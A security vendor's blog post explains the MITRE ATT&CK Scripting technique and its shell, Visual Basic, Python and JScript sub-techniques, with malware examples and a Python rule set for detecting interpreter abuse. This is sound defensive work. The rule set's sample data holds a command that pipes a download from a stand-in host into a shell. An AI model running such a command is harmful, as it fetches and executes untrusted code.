Hackers’ Favourite Scripting Languages Part 1: MITRE ATT&CK T1064 Scripting Technique

by Süleyman Özarslan, PhD

In 2019, Picus Labs analyzed 48,813 malware samples to determine the tactics, techniques, and procedures (TTPs) used by adversaries in these malicious files. Picus Labs categorized each observed TTP using the MITRE ATT&CK® framework. As a result, 445,018 TTPs observed in the last year were mapped to ATT&CK to identify the top 10 most common techniques used by attackers. This research found that Scripting was the sixth most prevalent ATT&CK technique used by adversaries in their malware.

A script is a set of commands written in a scripting language such as AppleScript, PowerShell, Python, Unix shells (bash, sh and others), VBScript, and JavaScript/JScript. Legitimate users such as system administrators and programmers use scripting to accelerate operational tasks by automating them. Adversaries also use scripts to automate multiple actions. Our research has found that Scripting was the sixth most prevalent ATT&CK technique used by adversaries in their malware.

Introduction

A script is an ordered set of commands written in a scripting language. A scripting language is an interpreted programming language that executes scripts without compiling them. Not only legitimate users but also adversaries use scripting to automate long tasks and execute code that performs multiple actions. Some scripting languages, such as PowerShell and VBScript on Windows, Unix shells on Unix-based systems, and AppleScript on macOS, can interact directly with the operating system at the API level, so adversaries can use them to bypass weak process monitoring mechanisms.

In this article, we review:

  • the fundamentals of the Scripting technique
  • updates on the technique in the new version of the ATT&CK framework
  • sub-techniques derived from the Scripting technique
  • its use cases by threat actors and malware
  • red and blue team exercises for this technique

If you’d like to learn more about MITRE ATT&CK, check out our LinkedIn group with all the latest! https://www.linkedin.com/groups/8955879/

Changes in the New Version of the MITRE ATT&CK Framework

The July 2020 (v7) ATT&CK release is the first non-beta release of Enterprise ATT&CK represented with sub-techniques [1]. MITRE ATT&CK Sub-techniques are a way to describe a specific implementation of a technique in more detail.

In the new sub-technique version of the MITRE ATT&CK Framework, the T1064 Scripting technique is deprecated. However, it was not completely removed in the new version. The Scripting technique is split into the separate T1059.004 Unix Shell, T1059.005 Visual Basic, T1059.006 Python, and T1059.007 JavaScript/JScript sub-techniques of T1059 Command and Scripting Interpreter.

Command and Scripting Interpreter Sub-techniques

The first three sub-techniques of the Command and Scripting Interpreter technique, T1059.001 PowerShell, T1059.002 AppleScript, and T1059.003 Windows Command Shell, were explained in our Command-Line Interface blog post. Command-Line Interface was the sixth most prevalent ATT&CK technique according to our 10 Critical ATT&CK Techniques research. Although these three are also scripting languages, they were not part of the Scripting technique in the previous ATT&CK version, since they were stand-alone techniques.

In this blog post, we describe four other sub-techniques that are derived from the Scripting technique.

1. T1059.004 Unix Shell

The Unix shell is the primary command-line interpreter, providing a command-line interface (CLI) for Unix-based operating systems (OS) such as macOS, Linux, and BSD. The Bourne Shell (sh), Bourne-Again Shell (bash), Z Shell (zsh), Korn Shell (ksh), and Secure Shell (SSH) are the most commonly used Unix shells.

In addition to an interactive CLI, the Unix shell also provides a scripting language for controlling the execution of the OS through shell scripts. A shell script is simply a set of commands listed in their execution order. The Unix shell can control any part of the system and supports typical programming concepts such as conditional tests, loops, file operations, variables, and functions.

Since Unix shells are powerful and flexible tools that execute commands and control the system, adversaries use Unix shells to execute various commands and malicious payloads. Moreover, they control remote systems with SSH during the lateral movement and command and control phases. Some use cases of Unix shells in malware:

  • to execute multiple commands on victims: macOS Bundlore adware [2], Derusbi malware [3], Linux/Exaramel backdoor [4]
  • to create a reverse shell: CallMe OSX Trojan [5], Chaos backdoor [6], CoinTicker macOS cryptocurrency ticker [7]
  • to start/stop OS services and installed applications: LoudMiner cross-platform cryptocurrency miner [8], WindTail OSX backdoor [9]
  • to download additional payloads: Shlayer macOS malware [9], [10], Skidmap cryptocurrency miner [11]

2. T1059.005 Visual Basic

  • Visual Basic for Applications (VBA): VBA is an implementation of the Visual Basic language that provides process automation, Windows API access, and other low-level functionality through DLLs. It is included in most Microsoft Office applications, including Office for macOS. In a common malicious usage scenario, adversaries embed malicious code in VBA macros in Microsoft Office files, then send these files to victims as email attachments (MITRE ATT&CK T1566.001 Spearphishing Attachment).
  • VBScript (Microsoft Visual Basic Scripting Edition): VBScript is a derivative of Visual Basic that enables the user to control many aspects of the system via COM. Although VBScript initially targeted web developers, providing web client scripting in Internet Explorer and web server scripting in IIS, it gained support from Windows system administrators, and from adversaries, because of its extensive functionality. For example, in a malware campaign revealed in March 2020, an obfuscated VBScript package was used to drop various malware families such as Zloader, Ursnif, Qakbot, and Dridex [16]. The initial access vector was an email containing a zipped VBScript file (.vbs) that appeared to be an invoice.

3. T1059.006 Python

Python is a popular high-level interpreted programming language. Since Python interpreters are available for most operating systems and the language has a comprehensive standard library, adversaries use Python to execute commands, download payloads, and perform various other malicious behaviors. Threat actors create not only malware but also vulnerability exploitation tools with Python.

Python can be executed in multiple ways:

  • interactively from the command-line interface (CLI)
  • via Python scripts (.py)
  • via binary executables created by compilation of Python code

One of the most recent Python-based malware families is the PoetRAT remote access trojan (RAT) [17]. Briefly, it uses a Word document containing a VBA script to drop a ZIP file. The VBA macro then unzips the file and executes PoetRAT, which is a Python script. The ZIP file also contains a Python interpreter, because Windows has no Python interpreter installed by default.

4. T1059.007 JavaScript/JScript

JavaScript (JS) is a high-level, multi-paradigm programming language that supports event-driven, functional, and imperative programming styles. JavaScript conforms to the ECMAScript specification, a standard for the interoperability of web pages across different browsers. In fact, ECMAScript is the official name of the JavaScript language [18]. JScript is Microsoft's implementation of the ECMAScript language specification [19]. Like most scripting languages, it is interpreted.

In most cases, adversaries use JScript to develop droppers/downloaders that install/download the actual malware [20], [21]. They apply heavy obfuscation to .js files, which can evade static AV signatures [20], [21]. In some cases, adversaries use VBA and JScript together in their malware, as in TrickBot [22].
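The four sub-techniques above share one detection surface: a script interpreter being launched. As an added example (not code from the original post or from Picus), the rule set below classifies constructed process-creation events, in the style of Sysmon Event ID 1 or auditd execve records, into T1059.004/.005/.006/.007 findings: an Office parent spawning an interpreter (the VBA macro and PoetRAT chains), an interpreter or .vbs/.js file running from a user-writable path (a dropped python.exe or a zipped invoice.vbs), and a Unix shell piping downloaded content into a shell. The event field names, sample paths, and the interpreter-to-sub-technique mapping are assumptions made for this example.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 / auditd execve style);
# sample data for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\invoice.vbs"'},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Users\alice\AppData\Local\Temp\py\python.exe",
     "cmdline": "python.exe launcher.py"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\report.js"'},
    {"parent": "/usr/bin/sshd", "image": "/bin/bash",
     "cmdline": "bash -c 'curl -s http://example.invalid/p.sh | sh'"},
    {"parent": "/usr/sbin/cron", "image": "/bin/sh", "cmdline": "sh /etc/cron.daily/logrotate"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Interpreter binary -> ATT&CK sub-technique; wscript/cscript are refined by script extension.
INTERPRETERS = {"wscript.exe": "T1059.005", "cscript.exe": "T1059.005",
                "python.exe": "T1059.006", "pythonw.exe": "T1059.006",
                "sh": "T1059.004", "bash": "T1059.004", "zsh": "T1059.004", "ksh": "T1059.004"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|downloads)\\|\\programdata\\"
                           r"|\\windows\\temp\\|^/(tmp|var/tmp|dev/shm)/", re.I)
SCRIPT_ARG = re.compile(r'"?([^"\s]+\.(vbs|vbe|js|jse|wsf))"?', re.I)
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|k)?sh\b")


def classify(event):
    """Return a list of (sub-technique, reason) findings for one event."""
    image = re.split(r"[\\/]", event["image"])[-1].lower()
    parent = re.split(r"[\\/]", event["parent"])[-1].lower()
    cmd = event["cmdline"]
    tech = INTERPRETERS.get(image)
    if tech is None:
        return []  # not a scripting interpreter covered by this rule set
    script = SCRIPT_ARG.search(cmd) if image in ("wscript.exe", "cscript.exe") else None
    if script:
        tech = "T1059.005" if script.group(2).lower() in ("vbs", "vbe") else "T1059.007"
    findings = []
    if parent in OFFICE_PARENTS:  # macro spawning an interpreter (PoetRAT-style chain)
        findings.append((tech, f"{parent} spawned {image}"))
    if USER_WRITABLE.search(event["image"]):  # dropped interpreter, e.g. a bundled python.exe
        findings.append((tech, f"{image} runs from a user-writable path"))
    if script and USER_WRITABLE.search(script.group(1)):  # .vbs/.js launched from Temp/Downloads
        findings.append((tech, f"script {script.group(1)} in a user-writable path"))
    if tech == "T1059.004" and PIPE_TO_SHELL.search(cmd):  # download piped straight into a shell
        findings.append((tech, "downloaded content piped into a shell"))
    return findings
```

Running `classify` over `SAMPLE_EVENTS` flags the first four events and leaves the cron-driven `sh` untouched; cmd.exe and PowerShell are deliberately out of scope here, since they belong to the sub-techniques covered in the Command-Line Interface post.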

References

[1] “Updates — July 2020.” [Online]. Available: https://attack.mitre.org/resources/updates/updates-july-2020/. [Accessed: 10-Aug-2020]

[2] O. Sushko, “macOS Bundlore: Mac Virus Bypassing macOS Security Features,” 17-Apr-2019. [Online]. Available: https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis. [Accessed: 11-Aug-2020]

[3] “Website.” [Online]. Available: https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf. [Accessed: 11-Aug-2020]

[4] “New TeleBots backdoor: First evidence linking Industroyer to NotPetya,” 11-Oct-2018. [Online]. Available: https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/. [Accessed: 11-Aug-2020]

[5] R. Falcone and J. Miller-Osborn, “Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists,” 24-Jan-2016. [Online]. Available: https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/. [Accessed: 11-Aug-2020]

[6] S. Feldmann, “Chaos: a Stolen Backdoor Rising Again,” 14-Feb-2018. [Online]. Available: https://www.gosecure.net/blog/2018/02/14/chaos-a-stolen-backdoor-rising/. [Accessed: 11-Aug-2020]

[7] T. Reed, “Mac cryptocurrency ticker app installs backdoors,” 29-Oct-2018. [Online]. Available: https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/. [Accessed: 11-Aug-2020]

[8] “LoudMiner: Cross‑platform mining in cracked VST software,” 20-Jun-2019. [Online]. Available: https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/. [Accessed: 11-Aug-2020]

[9] “Middle East Cyber-Espionage.” [Online]. Available: https://objective-see.com/blog/blog_0x3B.html. [Accessed: 11-Aug-2020]

[10] “TAU Threat Intelligence Notification: New macOS Malware Variant of Shlayer (OSX) Discovered,” 12-Feb-2019. [Online]. Available: https://www.carbonblack.com/blog/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/. [Accessed: 11-Aug-2020]

[11] Trend Micro, “Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload,” 16-Sep-2019. [Online]. Available: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/. [Accessed: 11-Aug-2020]

[12] mcleanbyron, “The Component Object Model.” [Online]. Available: https://docs.microsoft.com/en-us/windows/win32/com/the-component-object-model. [Accessed: 11-Aug-2020]

[13] “The Windows Native API — TechNet Articles — United States (English) — TechNet Wiki.” [Online]. Available: https://social.technet.microsoft.com/wiki/contents/articles/11831.the-windows-native-api.aspx. [Accessed: 11-Aug-2020]

[14] “Inter-Process Communication: Component Object Model.” [Online]. Available: https://attack.mitre.org/techniques/T1559/001/. [Accessed: 11-Aug-2020]

[15] “Native API.” [Online]. Available: https://attack.mitre.org/techniques/T1106/. [Accessed: 11-Aug-2020]

[16] blubracket, “Obfuscated VBScript Drops Zloader, Ursnif, Qakbot, Dridex — Security Boulevard,” 24-Jun-2020. [Online]. Available: https://securityboulevard.com/2020/06/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex/. [Accessed: 11-Aug-2020]

[17] W. Mercer, “PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors.” [Online]. Available: http://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html. [Accessed: 12-Aug-2020]

[18] “JavaScript Versions.” [Online]. Available: https://www.w3schools.com/js/js_versions.asp. [Accessed: 12-Aug-2020]

[19] “JScript (ECMAScript3).” [Online]. Available: https://docs.microsoft.com/en-us/previous-versions/hbxc2t98(v=vs.85). [Accessed: 12-Aug-2020]

[20] “Undetected JScript Dropper Installs Sage Ransomware,” 20-Apr-2017. [Online]. Available: https://www.vmray.com/cyber-security-blog/undetected-jscript-dropper-executes-sage-ransomware/. [Accessed: 12-Aug-2020]

[21] “[No title].” [Online]. Available: https://file.gdatasoftware.com/web/en/documents/whitepaper/G_DATA_Analysis_Script.Trojan-Downloader.Fodevepdf.A.pdf. [Accessed: 12-Aug-2020]

[22] “Deobfuscating Ostap: TrickBot’s 34,000 Line JavaScript Downloader,” 03-Sep-2019. [Online]. Available: https://threatresearch.ext.hp.com/deobfuscating-ostap-trickbots-javascript-downloader/. [Accessed: 12-Aug-2020]

Originally published at https://www.picussecurity.com.
